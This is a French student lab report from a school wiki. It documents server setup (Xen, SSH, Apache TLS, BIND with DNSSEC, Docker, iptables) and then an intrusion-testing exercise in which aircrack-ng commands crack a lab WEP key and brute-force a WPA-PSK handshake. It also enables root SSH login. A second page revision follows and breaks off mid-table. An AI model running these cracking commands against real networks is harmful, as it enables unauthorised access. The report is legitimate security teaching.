&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52009</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52009"/>
				<updated>2020-01-05T15:06:34Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du Routeur 1 (R1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
